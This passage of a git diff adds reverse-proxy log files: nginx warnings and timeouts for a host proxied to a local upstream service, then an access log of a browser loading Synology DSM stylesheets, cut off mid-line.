02:14:08 [error] 251#251: *4796 upstream timed out (110: Connection timed out) while connecting to upstream, client: 34.169.204.82, server: targetts.ddns.net, request: "GET / HTTP/1.1", upstream: "http://172.17.0.1:5050/", host: "targetts.ddns.net" +2026/01/20 16:49:56 [error] 225#225: *71 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 35.227.45.121, server: targetts.ddns.net, request: "GET / HTTP/1.1", upstream: "http://172.17.0.1:5050/", host: "targetts.ddns.net", referrer: "http://targetts.ddns.net" +2026/01/21 02:28:22 [warn] 257#257: *12686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/72/0000003728 while reading upstream, client: 34.187.155.59, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/21 02:28:22 [warn] 257#257: *12693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/72/0000003729 while reading upstream, client: 34.187.155.59, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/21 02:28:22 [warn] 260#260: *12696 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/73/0000003730 while reading upstream, client: 34.187.155.59, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/21 02:28:22 [warn] 257#257: *12691 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/73/0000003731 while reading upstream, client: 34.187.155.59, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/22 01:45:52 [warn] 288#288: *23495 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/19/0000008192 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/22 01:45:52 [warn] 288#288: *23494 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/19/0000008193 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/22 01:45:52 [warn] 285#285: *23498 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/19/0000008194 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/22 01:45:52 [warn] 288#288: *23493 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/19/0000008195 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/23 03:02:49 [warn] 318#318: *2227 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/74/0000000744 while reading upstream, client: 34.19.112.70, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/23 03:02:49 [warn] 318#318: *2235 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/74/0000000745 while reading upstream, client: 34.19.112.70, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/23 03:02:49 [warn] 318#318: *2236 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/74/0000000746 while reading upstream, client: 34.19.112.70, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/23 03:02:49 [warn] 318#318: *2233 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/74/0000000747 while reading upstream, client: 34.19.112.70, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/24 13:40:41 [warn] 361#361: *70883 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/46/0000033463 while reading upstream, client: 34.123.170.104, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:40:41 [warn] 358#358: *70875 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/46/0000033464 while reading upstream, client: 34.72.176.129, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:40:42 [warn] 361#361: *70883 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/46/0000033465 while reading upstream, client: 34.123.170.104, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:24 [warn] 358#358: *70905 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/46/0000033466 while reading upstream, client: 205.169.39.30, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:24 [warn] 358#358: *70902 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/46/0000033467 while reading upstream, client: 205.169.39.30, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:24 [warn] 358#358: *70898 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/46/0000033468 while reading upstream, client: 205.169.39.30, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:24 [warn] 360#360: *70903 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/46/0000033469 while reading upstream, client: 205.169.39.30, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:28 [warn] 358#358: *70911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/47/0000033470 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:31 [warn] 358#358: *70911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/47/0000033471 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:34 [warn] 358#358: *70911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/47/0000033472 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:47 [warn] 360#360: *70933 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/47/0000033473 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:47 [warn] 360#360: *70936 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/47/0000033474 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:47 [warn] 360#360: *70934 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/47/0000033475 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/24 13:41:47 [warn] 360#360: *70935 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/47/0000033476 while reading upstream, client: 205.169.39.210, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/25 03:08:00 [warn] 375#375: *76009 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/71/0000035710 while reading upstream, client: 34.53.110.11, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/25 03:08:01 [warn] 377#377: *76014 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/71/0000035711 while reading upstream, client: 34.53.110.11, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/25 03:08:01 [warn] 375#375: *76015 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/71/0000035712 while reading upstream, client: 34.53.110.11, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/25 03:08:01 [warn] 377#377: *76016 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/71/0000035713 while reading upstream, client: 34.53.110.11, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/26 02:54:59 [warn] 222#222: *3689 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/48/0000001487 while reading upstream, client: 136.118.6.86, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/26 02:54:59 [warn] 223#223: *3693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/48/0000001488 while reading upstream, client: 136.118.6.86, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/26 02:54:59 [warn] 223#223: *3692 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/48/0000001489 while reading upstream, client: 136.118.6.86, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/26 02:55:00 [warn] 224#224: *3688 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/49/0000001490 while reading upstream, client: 136.118.6.86, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/27 23:22:36 [warn] 292#292: *15396 using uninitialized "server" variable while logging request, client: 185.253.162.154, server: targetts.ddns.net, request: "GET / HTTP/1.1", host: "targetts.ddns.net" +2026/01/28 02:30:23 [warn] 292#292: *18489 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/54/0000007549 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/28 02:30:23 [warn] 293#293: *18494 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/55/0000007550 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/28 02:30:23 [warn] 295#295: *18495 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/55/0000007551 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/28 02:30:23 [warn] 292#292: *18493 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/55/0000007552 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 02:29:39 [warn] 351#351: *34925 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000014986 while reading upstream, client: 34.11.129.253, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 02:29:39 [warn] 352#352: *34932 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000014987 while reading upstream, client: 34.11.129.253, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 02:29:39 [warn] 351#351: *34929 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000014988 while reading upstream, client: 34.11.129.253, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 02:29:39 [warn] 349#349: *34933 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000014989 while reading upstream, client: 34.11.129.253, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 18:36:04 [warn] 371#371: *43446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000017971 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 18:36:04 [warn] 371#371: *43445 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000017972 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 18:36:04 [warn] 371#371: *43450 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000017973 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/29 18:36:04 [warn] 371#371: *43448 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000017974 while reading upstream, client: 34.182.116.62, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/02/02 02:53:44 [warn] 297#297: *18274 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/72/0000006722 while reading upstream, client: 34.83.253.1, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/02/02 02:53:44 [warn] 295#295: *18275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/72/0000006723 while reading upstream, client: 34.83.253.1, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/02/02 02:53:44 [warn] 297#297: *18279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/72/0000006724 while reading upstream, client: 34.83.253.1, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/02/02 02:53:44 [warn] 297#297: *18277 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/72/0000006725 while reading upstream, client: 34.83.253.1, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" diff --git a/proxy-manager/data/logs/proxy-host-3_error.log.1.gz b/proxy-manager/data/logs/proxy-host-3_error.log.1.gz new file mode 100755 index 0000000..afb50cc Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-3_error.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-3_error.log.2.gz b/proxy-manager/data/logs/proxy-host-3_error.log.2.gz new file mode 100755 index 0000000..f799b9f Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-3_error.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-3_error.log.3.gz b/proxy-manager/data/logs/proxy-host-3_error.log.3.gz new file mode 100755 index 0000000..38ed34b Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-3_error.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-4_access.log b/proxy-manager/data/logs/proxy-host-4_access.log new file mode 100755 index 0000000..e69de29 diff --git a/proxy-manager/data/logs/proxy-host-4_error.log b/proxy-manager/data/logs/proxy-host-4_error.log new file mode 100755 index 0000000..e69de29 diff --git a/proxy-manager/data/logs/proxy-host-5_access.log b/proxy-manager/data/logs/proxy-host-5_access.log new file mode 100755 index 0000000..035a1a8 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-5_access.log @@ -0,0 +1,798 @@ +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 84.1.26.27] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 84.1.26.27] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 84.1.26.27] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 84.1.26.27] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 84.1.26.27] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 84.1.26.27] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.css?v=1654081517" [Client 84.1.26.27] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/css/desktop.css?v=1661421011" [Client 84.1.26.27] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ExternalDevices/style.css?v=1661421011" [Client 84.1.26.27] [Length 1004] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SupportForm/style.css?v=1661757678" [Client 84.1.26.27] [Length 494] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/C3/style.css?v=1661421011" [Client 84.1.26.27] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DataDrivenDocuments/style.css?v=1661421011" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ActiveInsightUpdateNotify/style.css?v=1661421011" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PollingTask/style.css?v=1661757678" [Client 84.1.26.27] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/LogCenter/style.css?v=1657013615" [Client 84.1.26.27] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HotkeyManager/style.css?v=1661421011" [Client 84.1.26.27] [Length 1136] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 84.1.26.27] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 84.1.26.27] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 